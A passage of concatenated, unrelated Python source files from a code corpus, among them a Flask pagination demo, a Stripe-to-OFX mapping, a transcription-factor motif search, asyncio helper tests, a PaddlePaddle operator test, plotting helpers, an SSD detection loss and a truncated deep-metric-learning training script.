if not node.is_leaf():
avg_distance_to_tips = TreeCollapser.mean([root_distance[tip]-root_distance[node]
for tip in node2tips[node]])
if avg_distance_to_tips < min_dist:
# do whatever, ete support node annotation, deletion, labeling, etc.
# rename
# node.name += ' COLLAPSED avg_d:%g {%s}' %(avg_distance_to_tips,
# ','.join([tip.name for tip in node2tips[node]]))
node.name += '%s {%s}' % ([tip.name for tip in node2tips[node]][0],
','.join([tip.name for tip in node2tips[node]][1:]))
# label
node.add_features(collapsed=True)
# set drawing attribute so they look collapsed when displayed with tree.show()
node.img_style['draw_descendants'] = False
if __name__ == '__main__':
parser = ArgumentParser(description='Filter a blast xml file to keep the hits with a minimum % similarity'
'Much quicker to do than rerun the whole blast')
parser.add_argument('-i', '--input', metavar='sample.tree',
required=True,
help='Newick input tree')
parser.add_argument('-o', '--output', metavar='sample_collapsed.tree',
required=True,
help='Newick output tree')
parser.add_argument('-d', '--distance', metavar='0.01', type=float,
required=True,
help='Distance threshold. Nodes with distance smaller than this value will be collapsed.')
# Get the arguments into an object
arguments = parser.parse_args()
TreeCollapser(arguments)
|
the-stack_106_23233 | import random
from flask import Flask
from flask_restful import Api, Resource
from flask_rest_paginate import Pagination
from marshmallow import Schema, fields
"""
Initialize the app
"""
app = Flask(__name__)
api = Api(app)
# Possible configurations for Paginate
# app.config['PAGINATE_PAGE_SIZE'] = 20
# app.config['PAGINATE_PAGE_PARAM'] = "pagenumber"
# app.config['PAGINATE_SIZE_PARAM'] = "pagesize"
# app.config['PAGINATE_RESOURCE_LINKS_ENABLED'] = False
pagination = Pagination(app)
class CalculationSchema(Schema):
calculation_time = fields.Str()
value = fields.Str()
"""
Controllers
"""
class CalculationList(Resource):
def get(self):
"""
Simulates a computation that needs to be
performed by a backend service.
:return:
"""
import time
def largest_prime_factor(n):
"""
Returns the largest prime factor of a number
:param n:
:return: The largest prime factor of a number
"""
i = 2
while i * i <= n:
if n % i:
i += 1
else:
n //= i
return n
result_list = []
for i in range(100):
start = time.time()
# prime = largest_prime_factor(random.randint(100000, 200000))
result_list.append({"calculation_time": time.time() - start, "value": i})
tmp = pagination.paginate(result_list, CalculationSchema(many=True), marshmallow=True)
return tmp
"""
Register the resources
"""
api.add_resource(CalculationList, '/calculation')
"""
Run the app
"""
if __name__ == '__main__':
app.run(debug=True) |
the-stack_106_23234 | # -*- coding: utf-8 -*-
# vim: sw=4:ts=4:expandtab
# pylint: disable=invalid-name
"""
csv2ofx.mappings.stripe
~~~~~~~~~~~~~~~~~~~~~~~~
Provides a mapping for transactions obtained via Stripe card processing
Note that Stripe provides a Default set of columns or you can download
All columns. (as well as custom). The Default set does not include card
information, so provides no appropriate value for the PAYEE field for
an anonymous transaction (missing a customer).
It's suggested the All Columns format be used if not all transactions
identify a customer. This mapping sets PAYEE to Customer Name if it
exists, otherwise Card Name (if provided)
"""
from operator import itemgetter
mapping = {
"has_header": True,
"account": "Stripe",
"id": itemgetter("id"),
"date": itemgetter("created"),
"amount": itemgetter("amount"),
"currency": itemgetter("currency"),
"payee": lambda tr: tr.get("customer_description")
if len(tr.get("customer_description")) > 0
else tr.get("card_name", ""),
"desc": itemgetter("description"),
}
|
the-stack_106_23235 | import pandas as pd
def _filter_variant_motif_res(
motif_res,
variant_start,
variant_end,
motif_length,
seq,
):
"""
Remove MOODS motif hits that don't overlap the variant of interest.
Parameters
----------
motif_res : list
Result from MOODS search like [(21, 3.947748787969809), (-38,
3.979759977155675)].
variant_start : int
Relative start position of the allele string in seq (not genomic
coordinates). In other words, seq[variant_start:variant_end] should
give the allele.
variant_end : int
Relative end position of the allele string in seq (not genomic
coordinates). In other words, seq[variant_start:variant_end] should
give the allele.
motif_length : int
Length of the motif.
seq : str
Sequence searched for motifs for this allele.
Returns
-------
motif_res : list
List in the same format as motif_res input but with entries that don't
overlap the variant removed.
"""
import MOODS
remove = []
for r in motif_res:
motif_start = r[0]
motif_end = r[0] + motif_length
if r[0] < 0:
motif_start += len(seq)
motif_end += len(seq)
if motif_end <= variant_start or motif_start >= variant_end:
remove.append(r)
motif_res = list(set(motif_res) - set(remove))
return motif_res
def find_motif_disruptions(
position,
ref,
alt,
genome_fasta,
matrices,
):
"""
Determine whether there is a difference between the ref and alt
alleles for TF binding. Requires samtools in your path.
Parameters
----------
position : str
Zero based genomic coordinates of the reference allele of the form
chrom:start-end (chr5:100-101 for a SNV for instance). The value end -
start should equal the length of the ref allele.
ref : str
Reference allele. This should match the reference sequence at "position"
in genome_fasta.
alt : str
Alternate allele.
genome_fasta : str
Path to genome fasta file. This file should be indexed.
matrices : dict
Dict whose keys are motif names and whose values are pandas data frames
or numpy arrays containing PWMs with columns ACGT.
Returns
-------
out : pandas.DataFrame
Pandas data frame with motifs whose best matches that overlapped the
variant differed between the reference and alternate sequences. A score
of zero and a strand of '' indicates that there was not a match for the
motif on the given allele.
"""
import subprocess
import MOODS
# import pybedtools as pbt
max_motif_length = max([x.shape[0] for x in matrices.values()])
chrom, coords = position.split(':')
start,end = [int(x) for x in coords.split('-')]
s = '{}:{}-{}'.format(chrom, start - max_motif_length + 1, end +
max_motif_length - 1)
c = 'samtools faidx {} {}'.format(genome_fasta, s)
seq_lines = subprocess.check_output(c, shell=True).strip().split()
ref_seq = seq_lines[1]
alt_seq = ref_seq[0:max_motif_length - 1] + alt + ref_seq[max_motif_length + len(ref) - 1:]
ref_variant_start = max_motif_length - 1
ref_variant_end = max_motif_length - 1 + len(ref)
alt_variant_start = max_motif_length - 1
alt_variant_end = max_motif_length - 1 + len(alt)
ms = [matrices[x].T.values.tolist() for x in matrices.keys()]
ref_res = MOODS.search(ref_seq, ms, 0.001, both_strands=True,
bg=[0.25, 0.25, 0.25, 0.25])
ref_res = dict(zip(matrices.keys(), ref_res))
alt_res = MOODS.search(alt_seq, ms, 0.001, both_strands=True,
bg=[0.25, 0.25, 0.25, 0.25])
alt_res = dict(zip(matrices.keys(), alt_res))
# First we'll remove any motif matches that don't overlap the variant of interest (and thus
# can't be affected by the variant and will be the same for ref and alt). Then we'll get the
# best match for each motif for ref and alt.
rows = []
for motif in ref_res.keys():
ref_res[motif] = _filter_variant_motif_res(ref_res[motif], ref_variant_start, ref_variant_end,
matrices[motif].shape[0], ref_seq)
alt_res[motif] = _filter_variant_motif_res(alt_res[motif], alt_variant_start, alt_variant_end,
matrices[motif].shape[0], alt_seq)
if len(ref_res[motif]) > 0:
ref_pos, ref_score = sorted(ref_res[motif], key=lambda x: x[1], reverse=True)[0]
ref_strand = {True:'+', False:'-'}[ref_pos > 0]
else:
ref_score = 0
ref_strand = ''
if len(alt_res[motif]) > 0:
alt_pos, alt_score = sorted(alt_res[motif], key=lambda x: x[1], reverse=True)[0]
alt_strand = {True:'+', False:'-'}[alt_pos > 0]
else:
alt_score = 0
alt_strand = ''
if ref_score > 0 or alt_score > 0:
diff = ref_score - alt_score
rows.append([motif, ref_score, ref_strand, alt_score, alt_strand, diff])
out = pd.DataFrame(rows, columns=['motif', 'ref_score', 'ref_strand', 'alt_score',
'alt_strand', 'score_diff'])
out.index = out.motif
out = out.drop('motif', axis=1)
out = out[out.score_diff != 0]
return out
|
the-stack_106_23236 | import time
import asyncio
import contextlib
from appyter.ext.asyncio import helpers
from appyter.ext.itertools import alist
import logging
logger = logging.getLogger(__name__)
import pytest
from appyter.ext.pytest import assert_eq, assert_exc
from appyter.ext.asyncio.event_loop import with_event_loop
@pytest.fixture(scope="session", autouse=True)
def event_loop_fixture():
with with_event_loop():
yield
@contextlib.asynccontextmanager
async def asyncctx(a, *, b=1):
await asyncio.sleep(0.1)
yield a+b
async def asyncgenfun(a, *, b=1):
yield a
await asyncio.sleep(0.1)
yield a+b
async def asyncfun(a, *, b=1):
await asyncio.sleep(0.1)
return a+b
@contextlib.contextmanager
def syncctx(a, *, b=1):
time.sleep(0.1)
yield a+b
def syncgenfun(a, *, b=1):
yield a
time.sleep(0.1)
yield a+b
def syncfun(a, *, b=1):
time.sleep(0.1)
return a+b
async def async_mixedfun(a, *, b=1):
return await helpers.ensure_async(syncfun(a, b=b))
def sync_exc():
logger.info("Sync: Raising Runtime Error")
raise RuntimeError()
async def async_exc():
logger.info("Async: Raising Runtime Error")
raise RuntimeError()
def test_ensure_sync_async_ctx():
with helpers.ensure_sync(asyncctx(1)) as ctx: assert_eq(ctx, 2)
with helpers.ensure_sync(asyncctx)(0,b=2) as ctx: assert_eq(ctx, 2)
def test_ensure_sync_async_gen():
assert_eq(list(helpers.ensure_sync(asyncgenfun)(1)), [1,2])
assert_eq(list(helpers.ensure_sync(asyncgenfun(0,b=2))), [0,2])
def test_ensure_sync_async_fun():
assert_eq(helpers.ensure_sync(asyncfun)(1), 2)
assert_eq(helpers.ensure_sync(asyncfun(0,b=2)), 2)
def test_ensure_sync_async_exc():
with assert_exc(RuntimeError):
helpers.ensure_sync(async_exc)()
def test_ensure_sync_sync_ctx():
i = 0
with helpers.ensure_sync(syncctx(1)) as ctx:
assert_eq(ctx, 2)
i += 1
with helpers.ensure_sync(syncctx)(0,b=2) as ctx:
assert_eq(ctx, 2)
i += 1
assert_eq(i, 2)
def test_ensure_sync_sync_gen():
assert_eq(list(helpers.ensure_sync(syncgenfun)(1)), [1,2])
assert_eq(list(helpers.ensure_sync(syncgenfun(0,b=2))), [0,2])
def test_ensure_sync_sync_fun():
assert_eq(helpers.ensure_sync(syncfun)(1), 2)
assert_eq(helpers.ensure_sync(syncfun(0,b=2)), 2)
def test_ensure_sync_sync_exc():
with assert_exc(RuntimeError):
helpers.ensure_sync(sync_exc)()
def test_ensure_sync_mixed_fun():
assert_eq(helpers.ensure_sync(async_mixedfun(0,b=2)), 2)
async def _test_ensure_async_async_ctx():
i = 0
async with helpers.ensure_async(asyncctx(1)) as ctx:
i += 1
assert_eq(ctx, 2)
# Not supported
# async with helpers.ensure_async(asyncctx)(0,b=2) as ctx: assert_eq(ctx, 2)
assert_eq(i, 1)
def test_ensure_async_async_ctx():
helpers.ensure_sync(_test_ensure_async_async_ctx)()
async def _test_ensure_async_async_gen():
assert_eq(await alist(helpers.ensure_async(asyncgenfun)(1)), [1,2])
assert_eq(await alist(helpers.ensure_async(asyncgenfun(0,b=2))), [0,2])
def test_ensure_async_async_gen():
helpers.ensure_sync(_test_ensure_async_async_gen)()
async def _test_ensure_async_async_fun():
assert_eq(await helpers.ensure_async(asyncfun)(1), 2)
assert_eq(await helpers.ensure_async(asyncfun(0,b=2)), 2)
def test_ensure_async_async_fun():
helpers.ensure_sync(_test_ensure_async_async_fun)()
async def _test_ensure_async_async_exc():
with assert_exc(RuntimeError):
await helpers.ensure_async(async_exc)()
def test_ensure_async_async_exc():
helpers.ensure_sync(_test_ensure_async_async_exc)()
async def _test_ensure_async_sync_ctx():
i = 0
async with helpers.ensure_async(syncctx(1)) as ctx:
i += 1
assert_eq(ctx, 2)
# Not supported
# async with helpers.ensure_async(syncctx)(0,b=2) as ctx: assert_eq(ctx, 2)
assert_eq(i, 1)
def test_ensure_async_sync_ctx():
helpers.ensure_sync(_test_ensure_async_sync_ctx)()
async def _test_ensure_async_sync_gen():
assert_eq(await alist(helpers.ensure_async(syncgenfun)(1)), [1,2])
assert_eq(await alist(helpers.ensure_async(syncgenfun(0,b=2))), [0,2])
def test_ensure_async_sync_gen():
helpers.ensure_sync(_test_ensure_async_sync_gen)()
async def _test_ensure_async_sync_fun():
assert_eq(await helpers.ensure_async(syncfun)(1), 2)
assert_eq(await helpers.ensure_async(syncfun(0,b=2)), 2)
def test_ensure_async_sync_fun():
helpers.ensure_sync(_test_ensure_async_sync_fun)()
async def _test_ensure_async_sync_exc():
with assert_exc(RuntimeError):
await helpers.ensure_async(sync_exc)()
def test_ensure_async_sync_exc():
helpers.ensure_sync(_test_ensure_async_sync_exc)()
async def _test_ensure_async_mixed_fun():
assert_eq(await helpers.ensure_async(async_mixedfun(0,b=2)), 2)
def test_ensure_async_mixed_fun():
helpers.ensure_sync(_test_ensure_async_mixed_fun)()
async def _test_async_sync_bottom_up_exc():
try:
await helpers.ensure_async(sync_exc)()
except RuntimeError as e:
assert isinstance(e, RuntimeError)
logger.info(f"Async: Received {repr(e)}, Re-raising")
raise
def test_async_sync_bottom_up_exc():
with assert_exc(RuntimeError):
logger.info("Starting async_sync_exc")
helpers.ensure_sync(_test_async_sync_bottom_up_exc)()
logger.info("Done.")
@contextlib.asynccontextmanager
async def _test_async_sync_top_down_exc():
try:
yield
except KeyboardInterrupt as e:
assert isinstance(e, KeyboardInterrupt)
logger.info(f"Async: Received {repr(e)}, Re-raising")
raise
def test_async_sync_top_down_exc():
with assert_exc(KeyboardInterrupt):
with helpers.ensure_sync(_test_async_sync_top_down_exc()):
time.sleep(0.5)
raise KeyboardInterrupt
def test_async_sync_async_ctx():
class MyAsynCls:
def __init__(self):
logger.debug("MyAsynCls()")
async def __aenter__(self):
logger.debug("MyAsynCls.__aenter__")
await asyncio.sleep(0.1)
return self
async def __aexit__(self, *args):
logger.debug("MyAsynCls.__aexit__")
await asyncio.sleep(0.1)
class MySynCls:
def __init__(self):
logger.debug("MySynCls()")
self.asyn = MyAsynCls()
def __enter__(self):
logger.debug("MySynCls.__enter__")
helpers.ensure_sync(self.asyn.__aenter__())
time.sleep(0.1)
def __exit__(self, *args):
helpers.ensure_sync(self.asyn.__aexit__(*args))
time.sleep(0.1)
logger.debug("MySynCls.__exit__")
async def _test():
syn = MySynCls()
logger.debug("with MySynCls")
# with syn: # NOTE: this would cause a hang
async with helpers.ensure_async(syn):
logger.debug("entered")
await asyncio.sleep(0.1)
logger.debug("exited")
helpers.ensure_sync(_test())
|
the-stack_106_23237 | # Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle
import paddle.fluid.core as core
from paddle.fluid.tests.unittests.op_test import OpTest, skip_check_grad_ci
'''
test case for s8 * s8
'''
@skip_check_grad_ci(
reason=
"mul_mkldnn_op does not implement grad operator, check_grad is not required."
)
class TestMKLDNNMulOpS8S8(OpTest):
def setUp(self):
self.op_type = "mul"
self.init_kernel_type()
self.init_data_type()
self.init_data()
self.attrs = {
"use_mkldnn": self.use_mkldnn,
"scale_x": self.scale_x,
"scale_y": self.scale_y,
"scale_out": self.scale_out,
"force_fp32_output": self.force_fp32,
}
def init_kernel_type(self):
self.use_mkldnn = True
self.force_fp32 = True
def init_data_type(self):
self.srctype = np.uint8
self.dsttype = np.float32 if self.force_fp32 else np.int8
def init_data(self):
self.scale_x = 0.6
self.scale_y = [0.8]
self.scale_out = 1.0
# limit random range inside |-127, 127| to avoid overflow on SKL
if self.srctype == np.int8:
A_data = np.random.randint(-127, 127, (20, 5)).astype(np.int8)
else:
A_data = np.random.randint(0, 127, (20, 5)).astype(np.uint8)
B_data = np.random.uniform(-127, 127, (5, 20)).astype(np.float32)
quant_B = np.round(B_data * self.scale_y[0]).astype(np.int_)
output = np.dot(A_data, quant_B)
scale_output_shift = (self.scale_out) / \
(self.scale_x * self.scale_y[0])
if (self.force_fp32):
output = (output * scale_output_shift).astype(self.dsttype)
else:
output = np.round(output * scale_output_shift).astype(self.dsttype)
self.inputs = {'X': A_data, 'Y': B_data}
self.outputs = {'Out': output}
def test_check_output(self):
# TODO(wangzhongpu): support mkldnn op in dygraph mode
self.check_output_with_place(core.CPUPlace(),
atol=0,
check_dygraph=False)
'''
test case for s8 * u8
'''
class TestMKLDNNMulOpS8U8(TestMKLDNNMulOpS8S8):
def init_data_type(self):
self.srctype = np.uint8
self.dsttype = np.float32 if self.force_fp32 else np.int8
'''
test case for s8 * s8
'''
class TestMKLDNNMulOpS8S8WithFlatten(TestMKLDNNMulOpS8S8):
def setUp(self):
self.op_type = "mul"
self.init_kernel_type()
self.init_data_type()
self.init_data()
self.attrs = {
"use_mkldnn": self.use_mkldnn,
"scale_x": self.scale_x,
"scale_y": self.scale_y,
"scale_out": self.scale_out,
"force_fp32_output": self.force_fp32,
"x_num_col_dims": 2,
"y_num_col_dims": 2,
}
def init_data(self):
self.scale_x = 0.6
self.scale_y = [0.8]
self.scale_out = 1.0
# limit random range inside |-127, 127| to avoid overflow on SKL
if self.srctype == np.int8:
A_data = np.random.randint(-127, 127, (3, 4, 4, 3)).astype(np.int8)
else:
A_data = np.random.randint(0, 127, (3, 4, 4, 3)).astype(np.uint8)
B_data = np.random.uniform(-127, 127,
(2, 6, 1, 2, 3)).astype(np.float32)
A_data_reshape = A_data.reshape(3 * 4, 4 * 3)
B_data_reshape = B_data.reshape(2 * 6, 1 * 2 * 3)
quant_B = np.round(B_data_reshape * self.scale_y[0]).astype(np.int_)
output = np.dot(A_data_reshape, quant_B)
scale_output_shift = (self.scale_out) / \
(self.scale_x * self.scale_y[0])
if (self.force_fp32):
output = (output * scale_output_shift).astype(self.dsttype)
else:
output = np.round(output * scale_output_shift).astype(self.dsttype)
output = output.reshape(3, 4, 1, 2, 3)
self.inputs = {'X': A_data, 'Y': B_data}
self.outputs = {'Out': output}
'''
test case for s8 * u8
'''
class TestMKLDNNMulOpS8U8WithFlatten(TestMKLDNNMulOpS8S8WithFlatten):
def init_data_type(self):
self.srctype = np.uint8
self.dsttype = np.float32 if self.force_fp32 else np.int8
if __name__ == '__main__':
paddle.enable_static()
unittest.main()
|
the-stack_106_23239 | import numpy as np
import matplotlib.pylab as plt
import cv2
from skimage.metrics import structural_similarity as ssim
from skimage.metrics import peak_signal_noise_ratio as psnr
import os
from os.path import join as opj
from os.path import dirname as opd
from tqdm import tqdm
def plot(img,title="",savename="",savedir=None):
plt.figure()
plt.title(title)
plt.imshow(img,vmax=img.max(),vmin=0)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot12(img1,img2,title1="",title2="",title="",savename="",savedir=None):
fig = plt.figure()
fig.suptitle(title)
plt.subplot(121)
plt.title(title1)
plt.imshow(img1,vmax=img1.max(),vmin=0)
plt.subplot(122)
plt.title(title2)
plt.imshow(img2,vmax=img2.max(),vmin=0)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot_hist(array,bins=None,title='',savename="",savedir=None):
plt.figure()
plt.title(title)
if bins!=None:
plt.hist(array,bins=bins)
else:
plt.hist(array)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot_matrix(matrix,cmap='viridis_r',vmin=None,vmax=None,text=False,title='',savename="",savedir=None):
plt.figure(figsize=(20,20))
plt.title(title)
if vmin!=None and vmax!=None:
plt.imshow(matrix,cmap=cmap,vmin=vmin,vmax=vmax)
else:
plt.imshow(matrix,cmap=cmap)
plt.colorbar(shrink=0.8)
if text:
for i in range(matrix.shape[0]):
for j in range(matrix.shape[1]):
plt.text(j, i, "{:.2f}".format(matrix[i, j]),
ha="center", va="center", color="w",size=8)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot_boxplot(array,showfliers=True,whis=1.5,flierprops=None,title='',savename="",savedir=None):
plt.figure()
plt.title(title)
plt.boxplot(array,showfliers=showfliers,whis=whis,flierprops=flierprops)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close()
def plot12_boxplot(array1,array2,showfliers=True,whis=1.5,flierprops=None,
title1="",title2="",title="",savename="",savedir=None):
fig = plt.figure()
fig.suptitle(title)
plt.subplot(121)
plt.title(title1)
plt.boxplot(array1,showfliers=showfliers,whis=whis,flierprops=flierprops)
plt.subplot(122)
plt.title(title2)
plt.boxplot(array2,showfliers=showfliers,whis=whis,flierprops=flierprops)
if savedir!=None:
plt.savefig(opj(savedir,savename+'.png'),dpi=200)
else:
plt.show()
plt.close() |
the-stack_106_23241 | # Copyright (c) 2018-2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
class OptLoss(torch.jit.ScriptModule):
"""
Implements the loss as the sum of the followings:
1. Confidence Loss: All labels, with hard negative mining
2. Localization Loss: Only on positive labels
Suppose input dboxes has the shape 8732x4
"""
__constants__ = ['scale_xy', 'scale_wh', 'dboxes_xy', 'dboxes_wh']
def __init__(self, dboxes):
super(OptLoss, self).__init__()
self.scale_xy = 1.0/dboxes.scale_xy
self.scale_wh = 1.0/dboxes.scale_wh
self.sl1_loss = torch.nn.SmoothL1Loss(reduce=False)
self.dboxes = torch.nn.Parameter(dboxes(order="xywh").transpose(0, 1).unsqueeze(dim = 0),
requires_grad=False)
self.register_buffer('dboxes_xy', self.dboxes[:, :2, :])
self.register_buffer('dboxes_wh', self.dboxes[:, 2:, :])
self.dboxes_xy.requires_grad = False
self.dboxes_wh.requires_grad = False
# Two factor are from following links
# http://jany.st/post/2017-11-05-single-shot-detector-ssd-from-scratch-in-tensorflow.html
self.con_loss = torch.nn.CrossEntropyLoss(reduce=False)
@torch.jit.script_method
def _loc_vec(self, loc):
"""
Generate Location Vectors
"""
# loc_wh, loc_xy = loc[:, :2, :], loc[:, 2:, :]
gxy = self.scale_xy*(loc[:, :2, :] - self.dboxes_xy) / self.dboxes_wh
# gxy = self.scale_xy*(loc[:, :2, :] - self.dboxes[:, :2, :])/self.dboxes[:, 2:, ]
gwh = self.scale_wh*(loc[:, 2:, :] / self.dboxes_wh).log()
# gwh = self.scale_wh*(loc[:, 2:, :]/self.dboxes[:, 2:, :]).log()
#print(gxy.sum(), gwh.sum())
return torch.cat((gxy, gwh), dim=1).contiguous()
@torch.jit.script_method
def forward(self, ploc, plabel, gloc, glabel):
"""
ploc, plabel: Nx4x8732, Nxlabel_numx8732
predicted location and labels
gloc, glabel: Nx4x8732, Nx8732
ground truth location and labels
"""
mask = glabel > 0
pos_num = mask.sum(dim=1)
vec_gd = self._loc_vec(gloc)
# sum on four coordinates, and mask
sl1 = self.sl1_loss(ploc, vec_gd).sum(dim=1)
sl1 = (mask.type_as(sl1) * sl1).sum(dim=1)
# hard negative mining
con = self.con_loss(plabel, glabel)
# postive mask will never selected
con_neg = con.clone()
# con_neg[mask] = 0
con_neg.masked_fill_(mask, 0)
# con_neg[con_neg!=con_neg] = 0
con_neg.masked_fill_(con_neg!=con_neg, 0)
con_s, con_idx = con_neg.sort(dim=1, descending=True)
r = torch.arange(0, con_neg.size(1), dtype=torch.long, device='cuda').expand(con_neg.size(0), -1)
con_rank = r.scatter(1, con_idx, r)
# number of negative three times positive
neg_num = torch.clamp(3*pos_num, max=mask.size(1)).unsqueeze(-1)
neg_mask = con_rank < neg_num
closs = (con*(mask.type_as(con_s) + neg_mask.type_as(con_s))).sum(dim=1)
# avoid no object detected
total_loss = sl1 + closs
num_mask = (pos_num > 0).type_as(closs)
pos_num = pos_num.type_as(closs).clamp(min=1e-6)
ret = (total_loss * num_mask / pos_num).mean(dim=0)
return ret
|
the-stack_106_23243 | # -*- coding: utf-8 -*-
# Copyright 2018 IBM.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""Shared functionality and helpers for the unit tests."""
from enum import Enum
import inspect
import logging
import os
import unittest
from qiskit_aqua_chemistry import __path__ as qiskit_aqua_chemistry_path
TRAVIS_FORK_PULL_REQUEST = False
if os.getenv('TRAVIS_PULL_REQUEST_SLUG'):
if os.getenv('TRAVIS_REPO_SLUG') != os.getenv('TRAVIS_PULL_REQUEST_SLUG'):
TRAVIS_FORK_PULL_REQUEST = True
class Path(Enum):
"""Helper with paths commonly used during the tests."""
# Main SDK path: qiskit_aqua_chemistry/
SDK = qiskit_aqua_chemistry_path[0]
# test.python path: test/
TEST = os.path.dirname(__file__)
class QiskitAquaChemistryTestCase(unittest.TestCase):
"""Helper class that contains common functionality."""
SLOW_TEST = int(os.getenv('SLOW_TEST','0'))
@classmethod
def setUpClass(cls):
cls.moduleName = os.path.splitext(inspect.getfile(cls))[0]
cls.log = logging.getLogger(cls.__name__)
# Set logging to file and stdout if the LOG_LEVEL environment variable
# is set.
if os.getenv('LOG_LEVEL'):
# Set up formatter.
log_fmt = ('{}.%(funcName)s:%(levelname)s:%(asctime)s:'
' %(message)s'.format(cls.__name__))
formatter = logging.Formatter(log_fmt)
# Set up the file handler.
log_file_name = '%s.log' % cls.moduleName
file_handler = logging.FileHandler(log_file_name)
file_handler.setFormatter(formatter)
cls.log.addHandler(file_handler)
# Set the logging level from the environment variable, defaulting
# to INFO if it is not a valid level.
level = logging._nameToLevel.get(os.getenv('LOG_LEVEL'),
logging.INFO)
cls.log.setLevel(level)
@staticmethod
def _get_resource_path(filename, path=Path.TEST):
""" Get the absolute path to a resource.
Args:
filename (string): filename or relative path to the resource.
path (Path): path used as relative to the filename.
Returns:
str: the absolute path to the resource.
"""
return os.path.normpath(os.path.join(path.value, filename))
def assertNoLogs(self, logger=None, level=None):
"""The opposite to assertLogs.
"""
# pylint: disable=invalid-name
return _AssertNoLogsContext(self, logger, level)
class _AssertNoLogsContext(unittest.case._AssertLogsContext):
"""A context manager used to implement TestCase.assertNoLogs()."""
LOGGING_FORMAT = "%(levelname)s:%(name)s:%(message)s"
# pylint: disable=inconsistent-return-statements
def __exit__(self, exc_type, exc_value, tb):
"""
This is a modified version of unittest.case._AssertLogsContext.__exit__(...)
"""
self.logger.handlers = self.old_handlers
self.logger.propagate = self.old_propagate
self.logger.setLevel(self.old_level)
if exc_type is not None:
# let unexpected exceptions pass through
return False
for record in self.watcher.records:
self._raiseFailure(
"Something was logged in the logger %s by %s:%i" %
(record.name, record.pathname, record.lineno))
|
the-stack_106_23244 | #cpu time 0.03s
all_times = []
while True:
i = input()
if i == '0':
# let's end with the final output
for hour, minute, ampm in all_times[:-1]:
# for every time in all times, except the last
hour = hour[0].replace('0', '12') if len(hour) == 1 else hour
print('{}:{} {}'.format(hour, minute, ampm) if hour else '')
hour, minute, ampm = all_times[-1]
hour = hour[0].replace('0', '12') if len(hour) == 1 else hour
print('{}:{} {}'.format(hour, minute, ampm), end="")
break
current_times = []
if all_times:
# empty line in our print
all_times.append(['', '', ''])
for _ in range(int(i)):
# for our current input range add times to times list
time = input()
time = time[:2].replace('12', '0') + time[2:] # try to replace the 12 with 0
time = time.split()
current_times += [time[0].split(':') + [time[1]]] # append the current time to current_times
current_times.sort(key=lambda x: (x[2], int(x[0]), int(x[1]))) # sort all_times by am/pm, hours, minutes
all_times += current_times |
the-stack_106_23245 | from django.urls import path
from . import views
urlpatterns = [
path('', views.index, name='index'),
path('add/', views.add, name='add'),
path('update/', views.update, name='update'),
path('delete/', views.delete, name='delete'),
] |
the-stack_106_23246 | # Only used for PyTorch open source BUCK build
CXX = "Default"
ANDROID = "Android"
APPLE = "Apple"
FBCODE = "Fbcode"
WINDOWS = "Windows"
UNIFIED = "Unified"
# Apple SDK Definitions
IOS = "ios"
WATCHOS = "watchos"
MACOSX = "macosx"
APPLETVOS = "appletvos"
xplat_platforms = struct(
ANDROID = ANDROID,
APPLE = APPLE,
CXX = CXX,
FBCODE = FBCODE,
WINDOWS = WINDOWS,
UNIFIED = UNIFIED,
)
apple_sdks = struct(
IOS = IOS,
WATCHOS = WATCHOS,
MACOSX = MACOSX,
APPLETVOS = APPLETVOS,
)
|
the-stack_106_23248 | import sys
sys.path.append('../../configs')
sys.path.append('../../utils')
sys.path.append('../../tfops')
# ../../configs
from info import ACTIVATE_K_SET_IMGNET
# ../../utils
from datasetmanager import DATASETMANAGER_DICT
from format_op import params2id, listformat
from shutil_op import remove_file, remove_dir, copy_file, copy_dir
from writer import create_muldir, write_pkl
from csv_op import CsvWriter2
from reader import read_pkl
# ./
from local_config import K_SET, RESULT_DIR,\
DATASET, GPU_ID, BATCH_SIZE, EPOCH, NSCLASS,\
CONV_NAME, EMBED_M,\
LOSS_TYPE, MARGIN_ALPHA, LAMBDA,\
DECAY_TYPE, DECAY_PARAM_TYPE
from deepmetric import DeepMetric
import numpy as np
import itertools
import shutil
import glob
import os
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--gpu", default = GPU_ID, help="Utilize which gpu", type = int)
parser.add_argument("--dataset", default = DATASET, help="dataset to be used", type = str)
parser.add_argument("--nbatch", default = BATCH_SIZE, help="batch size", type = int)
parser.add_argument("--nsclass", default = NSCLASS, help="number of selected class in a batch", type = int)
parser.add_argument("--epoch", default = EPOCH, help="epoch to be ran", type = int)
parser.add_argument("--conv", default = CONV_NAME, help="conv network", type = str)
parser.add_argument("--ltype", default = LOSS_TYPE, help="loss type", type = str)
parser.add_argument("--m", default = EMBED_M, help="embedding m", type = int)
parser.add_argument("--lamb", default = LAMBDA, help="lambda", type = float)
parser.add_argument("--ma", default = MARGIN_ALPHA, help="margin alpha", type = float)
